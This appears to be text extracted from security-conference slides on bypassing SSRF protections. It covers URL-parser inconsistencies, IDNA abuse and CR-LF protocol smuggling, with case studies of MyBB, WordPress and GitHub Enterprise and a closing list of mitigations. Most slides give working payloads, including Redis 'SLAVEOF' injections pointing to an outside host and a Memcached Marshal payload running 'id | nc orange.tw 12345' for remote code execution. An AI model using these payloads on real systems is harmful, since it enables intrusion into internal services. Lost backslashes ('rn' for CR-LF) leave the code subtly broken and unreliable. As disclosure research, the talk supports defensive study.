36. Report the bug to cURL team and get a patch quickly
Bypass the patch with a space
Abusing URL Parsers
http://foo@127.0.0.1 @google.com/
37. Report Again But…
"curl doesn't verify that the URL is 100% syntactically correct. It is
instead documented to work with URLs and sort of assumes that
you pass it correct input"
39. Consider the following NodeJS code
NodeJS Unicode Failure
var base = "http://orange.tw/sandbox/";
var path = req.query.path;
if (path.indexOf("..") == -1) {
http.get(base + path, callback);
}
46. NodeJS Unicode Failure
HTTP module prevents requests from CR-LF Injection
Encode the New-lines as URL encoding
http://127.0.0.1:6379/rnSLAVEOF orange.tw 6379rn
$ nc -vvlp 6379
>> GET /%0D%0ASLAVEOF%20orange.tw%206379%0D%0A HTTP/1.1
>> Host: 127.0.0.1:6379
>> Connection: close
47. NodeJS Unicode Failure
HTTP module prevents requests from CR-LF Injection
Break the protections by Unicode U+FF0D U+FF0A
http://127.0.0.1:6379/-*SLAVEOF@orange.tw@6379-*
$ nc -vvlp 6379
>> GET /
>> SLAVEOF orange.tw 6379
>> HTTP/1.1
>> Host: 127.0.0.1:6379
>> Connection: close
48. GLibc NSS Features
In Glibc source code file resolv/ns_name.c#ns_name_pton()
/*%
* Convert an ascii string into an encoded domain name
as per RFC1035.
*/
int
ns_name_pton(const char *src, u_char *dst, size_t dstsiz)
49. GLibc NSS Features
RFC1035 - Decimal support in gethostbyname()
void main(int argc, char **argv) {
char *host = "or097nge.tw";
struct in_addr *addr = gethostbyname(host)->h_addr;
printf("%sn", inet_ntoa(*addr));
}
…50.116.8.239
50. GLibc NSS Features
RFC1035 - Decimal support in gethostbyname()
>>> import socket
>>> host = 'orange.tw'
>>> print host
orange.tw
>>> socket.gethostbyname(host)
'50.116.8.239'
51. GLibc NSS Features
void main(int argc, char **argv) {
struct addrinfo *res;
getaddrinfo("127.0.0.1 foo", NULL, NULL, &res);
struct sockaddr_in *ipv4 = (struct sockaddr_in *)res->ai_addr;
printf("%sn", inet_ntoa(ipv4->sin_addr));
}
…127.0.0.1
Linux getaddrinfo() strip trailing rubbish followed by whitespaces
52. GLibc NSS Features
Linux getaddrinfo() strip trailing rubbish followed by whitespaces
Lots of implementations relied on getaddrinfo()
>>> import socket
>>> socket.gethostbyname("127.0.0.1rnfoo")
'127.0.0.1'
53. GLibc NSS Features
Exploit Glibc NSS features on URL Parsing
http://127.0.0.1tfoo.google.com
http://127.0.0.1%09foo.google.com
http://127.0.0.1%2509foo.google.com
54. GLibc NSS Features
Exploit Glibc NSS features on URL Parsing
Why this works?
Some library implementations decode the URL TWICE…
http://127.0.0.1%2509foo.google.com
55. Exploit Glibc NSS features on Protocol Smuggling
HTTP protocol 1.1 required a host header
$ curl -vvv http://I-am-a-very-very-weird-domain.com
>> GET / HTTP/1.1
>> Host: I-am-a-very-very-weird-domain.com
>> User-Agent: curl/7.53.1
>> Accept: */*
GLibc NSS Features
56. GLibc NSS Features
Exploit Glibc NSS features on Protocol Smuggling
HTTP protocol 1.1 required a host header
http://127.0.0.1rnSLAVEOF orange.tw 6379rn:6379/
$ nc -vvlp 6379
>> GET / HTTP/1.1
>> Host: 127.0.0.1
>> SLAVEOF orange.tw 6379
>> :6379
>> Connection: close
57. GLibc NSS Features
https://127.0.0.1rnSET foo 0 60 5rn:443/
$ nc -vvlp 443
>> ..=5</.Aih9876.'. #...$...?...).%..g@?>3210...EDCB..
>> .....5'%"127.0.0.1
>> SET foo 0 60 5
Exploit Glibc NSS features on Protocol Smuggling
SNI Injection - Embed hostname in SSL Client Hello
Simply replace HTTP with HTTPS
58. GLibc NSS Features
Break the Patch of Python CVE-2016-5699
CR-LF Injection in HTTPConnection.putheader()
Space followed by CR-LF?
_is_illegal_header_value =
re.compile(rb'n(?![ t])|r(?![ tn])').search
…
if _is_illegal_header_value(values[i]):
raise ValueError('Invalid header value %r' % (values[i],))
59. Break the Patch of Python CVE-2016-5699
CR-LF Injection in HTTPConnection.putheader()
Space followed by CR-LF?
Bypass with a leading space
>>> import urllib
>>> url = 'http://0rn SLAVEOF orange.tw 6379rn :80'
>>> urllib.urlopen(url)
GLibc NSS Features
60. Break the Patch of Python CVE-2016-5699
Exploit with a leading space
Thanks to Redis and Memcached
GLibc NSS Features
http://0rn SLAVEOF orange.tw 6379rn :6379/
>> GET / HTTP/1.0
<< -ERR wrong number of arguments for 'get' command
>> Host: 0
<< -ERR unknown command 'Host:'
>> SLAVEOF orange.tw 6379
<< +OK Already connected to specified master
61. Abusing IDNA Standard
The problem relied on URL parser and URL requester use
different IDNA standard
IDNA2003 UTS46 IDNA2008
ⓖⓞⓞⓖⓛⓔ.com google.com google.com Invalid
gu200Doogle.com google.com google.com xn--google-pf0c.com
baß.de bass.de bass.de xn--ba-hia.de
62. Abusing IDNA Standard
>> "ß".toLowerCase()
"ß"
>> "ß".toUpperCase()
"SS"
>> ["ss", "SS"].indexOf("ß")
false
>> location.href = "http://wordpreß.com"
The problem relied on URL parser and URL requester use
different IDNA standard
64. Abusing URL Parsers - Case Study
WordPress
1. Paid lots of attentions on SSRF protections
2. We found 3 distinct ways to bypass the protections
3. Bugs have been reported since Feb. 25, 2017 but still unpatched
4. For the Responsible Disclosure Process, I will use MyBB as following
case study
65. Abusing URL Parsers - Case Study
The main concept is finding different behaviors among URL
parser, DNS checker and URL requester
URL parser DNS checker URL requester
WordPress parse_url() gethostbyname() *cURL
vBulletin parse_url() None *cURL
MyBB parse_url() gethostbynamel() *cURL
* First priority
67. Abusing URL Parsers - Case Study
1. gethostbyname() and get 1.2.3.4
2. Check 1.2.3.4 not in blacklist
3. Fetch URL by curl_init() and
cURL query DNS again!
4. 127.0.0.1 fetched, SSRF!
Q: foo.orange.tw
A: 1.2.3.4
Q: foo.orange.tw
A: 127.0.0.1
http://foo.orange.tw/
Hacker MyBB DNS
1
2
4
3
68. Abusing URL Parsers - Case Study
SSRF-Bypass tech #2
The inconsistency between DNS checker and URL requester
There is no IDNA converter in gethostbynamel(), but cURL has
1 $url = 'http://ß.orange.tw/'; // 127.0.0.1
2
3 $host = parse_url($url)[host];
4 $addresses = gethostbynamel($host); // bool(false)
5 if ($address) {
6 // check if address in white-list
7 }
8
9 $ch = curl_init();
10 curl_setopt($ch, CURLOPT_URL, $url);
11 curl_exec($ch);
69. Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
Fixed in PHP 7.0.13
…127.0.0.1:11211 fetched
$url = 'http://127.0.0.1:11211#@google.com:80/';
$parsed = parse_url($url);
var_dump($parsed[host]); // string(10) "google.com"
var_dump($parsed[port]); // int(80)
curl($url);
70. Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
Fixed in cURL 7.54 (The version of libcurl in Ubuntu 17.04 is still 7.52.1)
$url = 'http://foo@127.0.0.1:11211@google.com:80/';
$parsed = parse_url($url);
var_dump($parsed[host]); // string(10) "google.com"
var_dump($parsed[port]); // int(80)
curl($url);
…127.0.0.1:11211 fetched
71. Abusing URL Parsers - Case Study
SSRF-Bypass tech #3
The inconsistency between URL parser and URL requester
cURL won't fix :)
$url = 'http://foo@127.0.0.1 @google.com:11211/';
$parsed = parse_url($url);
var_dump($parsed[host]); // string(10) "google.com"
var_dump($parsed[port]); // int(11211)
curl($url);
…127.0.0.1:11211 fetched
72. Protocol Smuggling - Case Study
GitHub Enterprise
Standalone version of GitHub
Written in Ruby on Rails and code have been obfuscated
73. Protocol Smuggling - Case Study
About Remote Code Execution on GitHub Enterprise
Best report in GitHub 3rd Bug Bounty Anniversary Promotion!
Chaining 4 vulnerabilities into RCE
74. Protocol Smuggling - Case Study
First bug - SSRF-Bypass on Webhooks
What is Webhooks?
75. Protocol Smuggling - Case Study
First bug - SSRF-Bypass on Webhooks
Fetching URL by gem faraday
Blacklisting Host by gem faraday-restrict-ip-addresses
Blacklist localhost, 127.0.0.1… ETC
Simply bypassed with a zero
http://0/
76. Protocol Smuggling - Case Study
First bug - SSRF-Bypass on Webhooks
There are several limitations in this SSRF
Not allowed 302 redirection
Not allowed scheme out of HTTP and HTTPS
No CR-LF Injection in faraday
Only POST method
77. Protocol Smuggling - Case Study
Second bug - SSRF in internal Graphite service
GitHub Enterprise uses Graphite to draw charts
Graphite is bound on 127.0.0.1:8000
url = request.GET['url']
proto, server, path, query, frag = urlsplit(url)
if query: path += '?' + query
conn = HTTPConnection(server)
conn.request('GET',path)
resp = conn.getresponse()
79. Protocol Smuggling - Case Study
Third bug - CR-LF Injection in Graphite
Graphite is written in Python
The implementation of the second SSRF is httplib.HTTPConnection
As I mentioned before, httplib suffers from CR-LF Injection
We can smuggle other protocols with URL
http://0:8000/composer/send_email
?to=orange@chroot.org
&url=http://127.0.0.1:6379/%0D%0ASET…
80. Protocol Smuggling - Case Study
Fourth bug - Unsafe Marshal in Memcached gem
GitHub Enterprise uses Memcached gem as the cache client
All Ruby objects stored in cache will be Marshal-ed
81. Protocol Smuggling - Case Study
http://0:8000/composer/send_email
?to=orange@chroot.org
&url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer
ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco
unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation
%3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB
%07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A
%06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A
First SSRF Second SSRF Memcached protocol Marshal data
82. Protocol Smuggling - Case Study
http://0:8000/composer/send_email
?to=orange@chroot.org
&url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer
ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco
unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation
%3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB
%07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A
%06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A
First SSRF Second SSRF Memcached protocol Marshal data
83. Protocol Smuggling - Case Study
http://0:8000/composer/send_email
?to=orange@chroot.org
&url=http://127.0.0.1:11211/%0D%0Aset%20githubproductionsearch/quer
ies/code_query%3A857be82362ba02525cef496458ffb09cf30f6256%3Av3%3Aco
unt%200%2060%20150%0D%0A%04%08o%3A%40ActiveSupport%3A%3ADeprecation
%3A%3ADeprecatedInstanceVariableProxy%07%3A%0E%40instanceo%3A%08ERB
%07%3A%09%40srcI%22%1E%60id%20%7C%20nc%20orange.tw%2012345%60%06%3A
%06ET%3A%0C%40linenoi%00%3A%0C%40method%3A%0Bresult%0D%0A%0D%0A
First SSRF Second SSRF Memcached protocol Marshal data
$12,500
85. Mitigations
Application layer
Use the only IP and hostname, do not reuse the input URL
Network layer
Using Firewall or NetWork Policy to block Intranet traffics
Projects
SafeCurl by @fin1te
Advocate by @JordanMilne
86. Black Hat Sound Bytes
New Attack Surface on SSRF-Bypass
URL Parsing Issues
Abusing IDNA Standard
New Attack Vector on Protocol Smuggling
Linux Glibc NSS Features
NodeJS Unicode Failure
Case Studies
87. Further works
URL parser issues in OAuth
URL parser issues in modern browsers
URL parser issues in Proxy server
More...
88. Acknowledgements
1. Invalid URL parsing with '#'
by @bagder
2. URL Interop
by @bagder
3. Shibuya.XSS #8
by @mala
4. SSRF Bible
by @Wallarm
5. Special Thanks
Allen Own
Birdman Chiu
Henry Huang